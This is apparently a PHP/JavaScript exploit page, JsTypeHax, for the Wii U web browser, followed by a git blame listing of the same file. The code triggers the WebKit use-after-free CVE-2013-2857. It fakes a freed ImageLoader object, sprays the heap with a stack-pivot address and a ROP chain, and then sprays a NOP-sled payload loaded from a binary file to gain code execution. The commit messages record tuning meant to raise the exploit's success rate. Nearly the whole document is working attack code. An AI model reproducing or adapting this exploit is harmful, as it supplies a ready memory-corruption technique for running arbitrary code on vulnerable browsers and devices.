JsTypeHax/index.php

<?php
//Useful function
function hexentities($str) {
    $return = '';
    for($i = 0; $i < strlen($str); $i++) {
        $return .= '0x'.bin2hex(substr($str, $i, 1)).', ';
    }
    return $return;
}

// Settings
$_REQUEST['sysver'] = '550'; // Currently hardcoded.
$generatebinrop = 1; // Make sure the $ROPCHAIN will be in binary.

$pivotAdress            = 0x010ADDCC; // don't change this.
$payload_size_w_nops    = 0x20000; // the codegen is 128kb max.
$pivotAdressAdress      = 0x1B800000; // where does this come from? Seems to be stable with the current spraying

// These values could be adjusted to increase success rate.
$payload_srcaddr        = 0x1D500000 - 0x00A10000;
$payload_spray_size     = 0x400000;

$ROPHEAP                = $payload_srcaddr - 0x1000; //+ is a BAD idea as is may override our payload

$ropchainselect = 1; // Put codebin on heap and search it.
//$ropchainselect = 2; // Put codebin into ROP (Only works with reaaaaaally small payloads.
//$ropchainselect = 3; // Print string at payload_srcaddr. 

/**
 Expects a wiiuhaxx_common_cfg.php with the following variables
 
$wiiuhaxxcfg_payloadfilepath = "code550.bin"; // The actual payload that will be loaded.
$wiiuhaxxcfg_loaderfilepath = "wiiuhaxx_common/wiiuhaxx_loader.bin";
**/
require_once("wiiuhaxx_common/wiiu_browserhax_common.php");
generate_ropchain();
?>

<!--
Tested on 5.5.1
CVE-2013-2857
Use after free https://bugs.chromium.org/p/chromium/issues/detail?id=240124
Result: Bug is present, crash
-->
<script>
function UaF(a){    
    //Warning, the delta was modified !
    var delta                   = 0x0<!--#echo var="delta" -->000000; //from 0x0 to 0x04000000 step by 0x01000000
    var pivotAdress             = <?php echo $pivotAdress ?>;
    //5.5.2
    {
        var pivotAdressAdress   = <?php echo $pivotAdressAdress ?>; //r6
        var payloadAdress       = <?php echo $payload_srcaddr ?> + delta;
    }

    var codegenAddress          = 0x01800000; // don't change this.
    var sizeWebCoreImageLoader  = 0x18;       // don't change this.
    
    var payloadsizeWithNOPs     = <?php echo $payload_size_w_nops; ?>;
    var sprayCount              = <?php echo $payload_spray_size; ?>/payloadsizeWithNOPs;
    var _4K                     = 0x1000;
    var _16K                    = 0x4000;
    var _32K                    = 0x8000;
    
    //radio is the *ONLY* type that left the freed WebCore::ImageLoader free !
    a.type="radio";

    //Allocate this new WebCore::ImageLoader over freed WebCore::
    var ab = new ArrayBuffer(sizeWebCoreImageLoader);
    var dv = new DataView(ab)
    /*
    0:000:x86> dt webkit!WebCore::ImageLoader
       +0x000 __VFN_table : Ptr32
       +0x004 m_client         : Ptr32 WebCore::ImageLoaderClient
       +0x008 m_image          : WebCore::CachedResourceHandle<WebCore::CachedImage>
       +0x00c m_failedLoadURL  : WTF::AtomicString
       +0x010 m_hasPendingBeforeLoadEvent : Pos 0, 1 Bit
       +0x010 m_hasPendingLoadEvent : Pos 1, 1 Bit
       +0x010 m_hasPendingErrorEvent : Pos 2, 1 Bit
       +0x010 m_imageComplete  : Pos 3, 1 Bit
       +0x010 m_loadManually   : Pos 4, 1 Bit
       +0x010 m_elementIsProtected : Pos 5, 1 Bit
    */
    //Register:r3 Adress:0x1AF35330-0x1AF35360
    dv.setUint32(0x00, 0x00000000);         //vtable
    dv.setUint32(0x04, pivotAdressAdress);  //m_client
    dv.setUint32(0x08, pivotAdressAdress);  //m_image
    dv.setUint32(0x0C, 0x00000000);         //m_failedLoadURL
    dv.setUint32(0x10, 0x00000000);         //m_hasPendingBeforeLoadEvent
    dv.setUint32(0x14, 0x00000000);         //padding

    <?php echo "var realROPChain = [" .  hexentities($ROPCHAIN) . "]"; ?> // creates "var realROPChain = [...];"

    //Spray large ArrayBuffer with pivotAdress   
    var ar = new Array(0x1800);
    for(var i=0; i<0x1800; i++){
        ar[i] = new DataView(new ArrayBuffer(_4K));
        for(var j=0; j<_4K; j+=4){
            ar[i].setUint32(j, 0x10000000+j); //filler
        }

        ar[i].setUint32(0x204, 0x0);
        ar[i].setUint32(0x018, pivotAdressAdress);
        ar[i].setUint32(0x000, pivotAdressAdress+0x20);
        ar[i].setUint32(0x2BC, pivotAdress); //lwz r0, 0x4(r11) ; mtlr r0 ; mr r1, r11 ; li r3, -0x1 ; blr ;
        //r11, new stack location
        ar[i].setUint32(0x208, pivotAdressAdress+0x300);

        //initialize this Rop Chain
        var ropCurrentOffset = 0x304;
        
        //start of the Rop Chain                
        realROPChain.forEach(function(element) {
            ar[i].setUint8(ropCurrentOffset, element);
            ropCurrentOffset += 1;
        });
    }
     
    //Spray final payload
       
    <?php if($ropchainselect != 3) echo "/*" ?>
    
    // little helper function.
    function toHex(str) {
        var hex = '';
        for(var i=0;i<str.length;i++) {
            hex += ''+str.charCodeAt(i).toString(16);
        }
        return hex;
    }

    fillerID = 0;
    var expected_payloadsize = 0x4000; // ~ the size of the HBL payload.
    var ar2 = new Array(sprayCount);
    for(var i=0; i<sprayCount; i++){
        ar2[i] = new DataView(new ArrayBuffer(payloadsizeWithNOPs));
        var curOffset = 0;
        
        for(var curNopI =0;curNopI < (payloadsizeWithNOPs) /8;curNopI++){                
            var str = toHex(fillerID.toString(16)) + "00";                
            while(str.length < 0x10){
                if(curNopI > (payloadsizeWithNOPs - expected_payloadsize)/8){
                    // if the string begins with "_" it would have collided with ourpayload
                    str = "5F" + str;
                }else{
                    // if the string begins with "." everything would be okay.
                    str = "2E" + str;
                }
            }
            
            ar2[i].setUint32(curOffset,parseInt(str.substr(0,8),16));
            ar2[i].setUint32(curOffset+4,parseInt(str.substr(8,8),16));
            curOffset += 8;
            fillerID +=8;   
        }
    }
    
    <?php if($ropchainselect != 3) echo "*/" ?>
    <?php if($ropchainselect == 3) echo "/*" ?>
    
    <?php echo "var payload= [" . hexentities(wiiuhaxx_generatepayload()) . "];"; ?>
    var ar2 = new Array(sprayCount);
    for(var i=0; i<sprayCount; i++){
        ar2[i] = new DataView(new ArrayBuffer(payloadsizeWithNOPs));
    }
    for(var i=0; i<sprayCount; i++){
        var curOffset = 0;
        
        for(var curNopI =0;curNopI < (payloadsizeWithNOPs - payload.length) / 4;curNopI++){                
            ar2[i].setUint32(curOffset,0x60000000); // nop
            curOffset += 4; 
        }
        
        for(var curI = 0; curI< payload.length;curI++){
            ar2[i].setUint8(curOffset++,payload[curI]);
        }
    }
    <?php if($ropchainselect == 3) echo "*/" ?>
        
    //Use the new WebCore::ImageLoader & pivot !
    return 0;
}
</script>

<input id="x" type="image" onerror="UaF(this);" src=""/>
Reducing the amount of hardcoded (rop)values and payloads. Now you can just put in your payload in form of a "code.bin". 2019-01-07 00:32:47 +01:00			`<?php`
			`//Useful function`
			`function hexentities($str) {`
Tabs -> Spaces 2019-01-07 17:30:28 +01:00			`$return = '';`
			`for($i = 0; $i < strlen($str); $i++) {`
			`$return .= '0x'.bin2hex(substr($str, $i, 1)).', ';`
			`}`
			`return $return;`
Reducing the amount of hardcoded (rop)values and payloads. Now you can just put in your payload in form of a "code.bin". 2019-01-07 00:32:47 +01:00			`}`

			`// Settings`
			`$_REQUEST['sysver'] = '550'; // Currently hardcoded.`
Move a bunch of settings to the php section Tweaking some values Added comments Fix ROP building by adding missing "$generatebinrop = 1;" 2019-01-08 16:07:22 +01:00			`$generatebinrop = 1; // Make sure the $ROPCHAIN will be in binary.`
Reducing the amount of hardcoded (rop)values and payloads. Now you can just put in your payload in form of a "code.bin". 2019-01-07 00:32:47 +01:00
Improve heap spraying of the payload. Added support for the ropchaintype 3 (print a value). When selected, it prints the current offset of the sprayed. Can be used to tweak the payload_src_addr. 2019-01-08 16:14:56 +01:00			`$pivotAdress = 0x010ADDCC; // don't change this.`
			`$payload_size_w_nops = 0x20000; // the codegen is 128kb max.`
			`$pivotAdressAdress = 0x1B800000; // where does this come from? Seems to be stable with the current spraying`
Move a bunch of settings to the php section Tweaking some values Added comments Fix ROP building by adding missing "$generatebinrop = 1;" 2019-01-08 16:07:22 +01:00
			`// These values could be adjusted to increase success rate.`
Improve heap spraying of the payload. Added support for the ropchaintype 3 (print a value). When selected, it prints the current offset of the sprayed. Can be used to tweak the payload_src_addr. 2019-01-08 16:14:56 +01:00			`$payload_srcaddr = 0x1D500000 - 0x00A10000;`
			`$payload_spray_size = 0x400000;`
Move a bunch of settings to the php section Tweaking some values Added comments Fix ROP building by adding missing "$generatebinrop = 1;" 2019-01-08 16:07:22 +01:00
Improve heap spraying of the payload. Added support for the ropchaintype 3 (print a value). When selected, it prints the current offset of the sprayed. Can be used to tweak the payload_src_addr. 2019-01-08 16:14:56 +01:00			`$ROPHEAP = $payload_srcaddr - 0x1000; //+ is a BAD idea as is may override our payload`
Move a bunch of settings to the php section Tweaking some values Added comments Fix ROP building by adding missing "$generatebinrop = 1;" 2019-01-08 16:07:22 +01:00
			`$ropchainselect = 1; // Put codebin on heap and search it.`
			`//$ropchainselect = 2; // Put codebin into ROP (Only works with reaaaaaally small payloads.`
Improve heap spraying of the payload. Added support for the ropchaintype 3 (print a value). When selected, it prints the current offset of the sprayed. Can be used to tweak the payload_src_addr. 2019-01-08 16:14:56 +01:00			`//$ropchainselect = 3; // Print string at payload_srcaddr.`
Reducing the amount of hardcoded (rop)values and payloads. Now you can just put in your payload in form of a "code.bin". 2019-01-07 00:32:47 +01:00
			`/**`
			`Expects a wiiuhaxx_common_cfg.php with the following variables`

			`$wiiuhaxxcfg_payloadfilepath = "code550.bin"; // The actual payload that will be loaded.`
			`$wiiuhaxxcfg_loaderfilepath = "wiiuhaxx_common/wiiuhaxx_loader.bin";`
			`**/`
			`require_once("wiiuhaxx_common/wiiu_browserhax_common.php");`
Remove the unneeded "Rop helper", place the payload before the spraying 2019-01-08 16:04:37 +01:00			`generate_ropchain();`
Reducing the amount of hardcoded (rop)values and payloads. Now you can just put in your payload in form of a "code.bin". 2019-01-07 00:32:47 +01:00			`?>`

			`<!--`
			`Tested on 5.5.1`
			`CVE-2013-2857`
			`Use after free https://bugs.chromium.org/p/chromium/issues/detail?id=240124`
			`Result: Bug is present, crash`
			`-->`
			`<script>`
Remove unused debug code 2019-01-08 16:01:52 +01:00			`function UaF(a){`
Reducing the amount of hardcoded (rop)values and payloads. Now you can just put in your payload in form of a "code.bin". 2019-01-07 00:32:47 +01:00			`//Warning, the delta was modified !`
			`var delta = 0x0<!--#echo var="delta" -->000000; //from 0x0 to 0x04000000 step by 0x01000000`
Move a bunch of settings to the php section Tweaking some values Added comments Fix ROP building by adding missing "$generatebinrop = 1;" 2019-01-08 16:07:22 +01:00			`var pivotAdress = <?php echo $pivotAdress ?>;`
Reducing the amount of hardcoded (rop)values and payloads. Now you can just put in your payload in form of a "code.bin". 2019-01-07 00:32:47 +01:00			`//5.5.2`
			`{`
Improve heap spraying of the payload. Added support for the ropchaintype 3 (print a value). When selected, it prints the current offset of the sprayed. Can be used to tweak the payload_src_addr. 2019-01-08 16:14:56 +01:00			`var pivotAdressAdress = <?php echo $pivotAdressAdress ?>; //r6`
			`var payloadAdress = <?php echo $payload_srcaddr ?> + delta;`
Reducing the amount of hardcoded (rop)values and payloads. Now you can just put in your payload in form of a "code.bin". 2019-01-07 00:32:47 +01:00			`}`

Move a bunch of settings to the php section Tweaking some values Added comments Fix ROP building by adding missing "$generatebinrop = 1;" 2019-01-08 16:07:22 +01:00			`var codegenAddress = 0x01800000; // don't change this.`
			`var sizeWebCoreImageLoader = 0x18; // don't change this.`

Improve heap spraying of the payload. Added support for the ropchaintype 3 (print a value). When selected, it prints the current offset of the sprayed. Can be used to tweak the payload_src_addr. 2019-01-08 16:14:56 +01:00			`var payloadsizeWithNOPs = <?php echo $payload_size_w_nops; ?>;`
			`var sprayCount = <?php echo $payload_spray_size; ?>/payloadsizeWithNOPs;`
Reducing the amount of hardcoded (rop)values and payloads. Now you can just put in your payload in form of a "code.bin". 2019-01-07 00:32:47 +01:00			`var _4K = 0x1000;`
			`var _16K = 0x4000;`
			`var _32K = 0x8000;`
Move a bunch of settings to the php section Tweaking some values Added comments Fix ROP building by adding missing "$generatebinrop = 1;" 2019-01-08 16:07:22 +01:00
Reducing the amount of hardcoded (rop)values and payloads. Now you can just put in your payload in form of a "code.bin". 2019-01-07 00:32:47 +01:00			`//radio is the ONLY type that left the freed WebCore::ImageLoader free !`
			`a.type="radio";`

			`//Allocate this new WebCore::ImageLoader over freed WebCore::`
			`var ab = new ArrayBuffer(sizeWebCoreImageLoader);`
			`var dv = new DataView(ab)`
			`/*`
			`0:000:x86> dt webkit!WebCore::ImageLoader`
			`+0x000 __VFN_table : Ptr32`
			`+0x004 m_client : Ptr32 WebCore::ImageLoaderClient`
			`+0x008 m_image : WebCore::CachedResourceHandle<WebCore::CachedImage>`
			`+0x00c m_failedLoadURL : WTF::AtomicString`
			`+0x010 m_hasPendingBeforeLoadEvent : Pos 0, 1 Bit`
			`+0x010 m_hasPendingLoadEvent : Pos 1, 1 Bit`
			`+0x010 m_hasPendingErrorEvent : Pos 2, 1 Bit`
			`+0x010 m_imageComplete : Pos 3, 1 Bit`
			`+0x010 m_loadManually : Pos 4, 1 Bit`
			`+0x010 m_elementIsProtected : Pos 5, 1 Bit`
			`*/`
			`//Register:r3 Adress:0x1AF35330-0x1AF35360`
			`dv.setUint32(0x00, 0x00000000); //vtable`
			`dv.setUint32(0x04, pivotAdressAdress); //m_client`
			`dv.setUint32(0x08, pivotAdressAdress); //m_image`
			`dv.setUint32(0x0C, 0x00000000); //m_failedLoadURL`
			`dv.setUint32(0x10, 0x00000000); //m_hasPendingBeforeLoadEvent`
			`dv.setUint32(0x14, 0x00000000); //padding`

Remove the unneeded "Rop helper", place the payload before the spraying 2019-01-08 16:04:37 +01:00			`<?php echo "var realROPChain = [" . hexentities($ROPCHAIN) . "]"; ?> // creates "var realROPChain = [...];"`
Reducing the amount of hardcoded (rop)values and payloads. Now you can just put in your payload in form of a "code.bin". 2019-01-07 00:32:47 +01:00
Remove the unneeded "Rop helper", place the payload before the spraying 2019-01-08 16:04:37 +01:00			`//Spray large ArrayBuffer with pivotAdress`
Reducing the amount of hardcoded (rop)values and payloads. Now you can just put in your payload in form of a "code.bin". 2019-01-07 00:32:47 +01:00			`var ar = new Array(0x1800);`
			`for(var i=0; i<0x1800; i++){`
			`ar[i] = new DataView(new ArrayBuffer(_4K));`
			`for(var j=0; j<_4K; j+=4){`
			`ar[i].setUint32(j, 0x10000000+j); //filler`
			`}`

			`ar[i].setUint32(0x204, 0x0);`
			`ar[i].setUint32(0x018, pivotAdressAdress);`
			`ar[i].setUint32(0x000, pivotAdressAdress+0x20);`
			`ar[i].setUint32(0x2BC, pivotAdress); //lwz r0, 0x4(r11) ; mtlr r0 ; mr r1, r11 ; li r3, -0x1 ; blr ;`
			`//r11, new stack location`
			`ar[i].setUint32(0x208, pivotAdressAdress+0x300);`

			`//initialize this Rop Chain`
Remove the unneeded "Rop helper", place the payload before the spraying 2019-01-08 16:04:37 +01:00			`var ropCurrentOffset = 0x304;`
Tabs -> Spaces 2019-01-07 17:30:28 +01:00
Remove the unneeded "Rop helper", place the payload before the spraying 2019-01-08 16:04:37 +01:00			`//start of the Rop Chain`
Reducing the amount of hardcoded (rop)values and payloads. Now you can just put in your payload in form of a "code.bin". 2019-01-07 00:32:47 +01:00			`realROPChain.forEach(function(element) {`
Remove the unneeded "Rop helper", place the payload before the spraying 2019-01-08 16:04:37 +01:00			`ar[i].setUint8(ropCurrentOffset, element);`
			`ropCurrentOffset += 1;`
Tabs -> Spaces 2019-01-07 17:30:28 +01:00			`});`
Reducing the amount of hardcoded (rop)values and payloads. Now you can just put in your payload in form of a "code.bin". 2019-01-07 00:32:47 +01:00			`}`
Improve heap spraying of the payload. Added support for the ropchaintype 3 (print a value). When selected, it prints the current offset of the sprayed. Can be used to tweak the payload_src_addr. 2019-01-08 16:14:56 +01:00
Reducing the amount of hardcoded (rop)values and payloads. Now you can just put in your payload in form of a "code.bin". 2019-01-07 00:32:47 +01:00			`//Spray final payload`
Improve heap spraying of the payload. Added support for the ropchaintype 3 (print a value). When selected, it prints the current offset of the sprayed. Can be used to tweak the payload_src_addr. 2019-01-08 16:14:56 +01:00
			`<?php if($ropchainselect != 3) echo "/*" ?>`

			`// little helper function.`
			`function toHex(str) {`
			`var hex = '';`
			`for(var i=0;i<str.length;i++) {`
			`hex += ''+str.charCodeAt(i).toString(16);`
			`}`
			`return hex;`
			`}`

			`fillerID = 0;`
			`var expected_payloadsize = 0x4000; // ~ the size of the HBL payload.`
Tabs -> Spaces 2019-01-07 17:30:28 +01:00			`var ar2 = new Array(sprayCount);`
Reducing the amount of hardcoded (rop)values and payloads. Now you can just put in your payload in form of a "code.bin". 2019-01-07 00:32:47 +01:00			`for(var i=0; i<sprayCount; i++){`
Improve heap spraying of the payload. Added support for the ropchaintype 3 (print a value). When selected, it prints the current offset of the sprayed. Can be used to tweak the payload_src_addr. 2019-01-08 16:14:56 +01:00			`ar2[i] = new DataView(new ArrayBuffer(payloadsizeWithNOPs));`
			`var curOffset = 0;`

			`for(var curNopI =0;curNopI < (payloadsizeWithNOPs) /8;curNopI++){`
			`var str = toHex(fillerID.toString(16)) + "00";`
			`while(str.length < 0x10){`
			`if(curNopI > (payloadsizeWithNOPs - expected_payloadsize)/8){`
			`// if the string begins with "_" it would have collided with ourpayload`
			`str = "5F" + str;`
			`}else{`
			`// if the string begins with "." everything would be okay.`
			`str = "2E" + str;`
			`}`
Tabs -> Spaces 2019-01-07 17:30:28 +01:00			`}`
Improve heap spraying of the payload. Added support for the ropchaintype 3 (print a value). When selected, it prints the current offset of the sprayed. Can be used to tweak the payload_src_addr. 2019-01-08 16:14:56 +01:00
			`ar2[i].setUint32(curOffset,parseInt(str.substr(0,8),16));`
			`ar2[i].setUint32(curOffset+4,parseInt(str.substr(8,8),16));`
			`curOffset += 8;`
			`fillerID +=8;`
			`}`
Reducing the amount of hardcoded (rop)values and payloads. Now you can just put in your payload in form of a "code.bin". 2019-01-07 00:32:47 +01:00			`}`
Tabs -> Spaces 2019-01-07 17:30:28 +01:00
Improve heap spraying of the payload. Added support for the ropchaintype 3 (print a value). When selected, it prints the current offset of the sprayed. Can be used to tweak the payload_src_addr. 2019-01-08 16:14:56 +01:00			`<?php if($ropchainselect != 3) echo "*/" ?>`
			`<?php if($ropchainselect == 3) echo "/*" ?>`

			`<?php echo "var payload= [" . hexentities(wiiuhaxx_generatepayload()) . "];"; ?>`
			`var ar2 = new Array(sprayCount);`
			`for(var i=0; i<sprayCount; i++){`
			`ar2[i] = new DataView(new ArrayBuffer(payloadsizeWithNOPs));`
			`}`
			`for(var i=0; i<sprayCount; i++){`
			`var curOffset = 0;`

			`for(var curNopI =0;curNopI < (payloadsizeWithNOPs - payload.length) / 4;curNopI++){`
			`ar2[i].setUint32(curOffset,0x60000000); // nop`
			`curOffset += 4;`
			`}`

			`for(var curI = 0; curI< payload.length;curI++){`
			`ar2[i].setUint8(curOffset++,payload[curI]);`
			`}`
			`}`
			`<?php if($ropchainselect == 3) echo "*/" ?>`

Reducing the amount of hardcoded (rop)values and payloads. Now you can just put in your payload in form of a "code.bin". 2019-01-07 00:32:47 +01:00			`//Use the new WebCore::ImageLoader & pivot !`
			`return 0;`
			`}`
			`</script>`

Move a bunch of settings to the php section Tweaking some values Added comments Fix ROP building by adding missing "$generatebinrop = 1;" 2019-01-08 16:07:22 +01:00			`<input id="x" type="image" onerror="UaF(this);" src=""/>`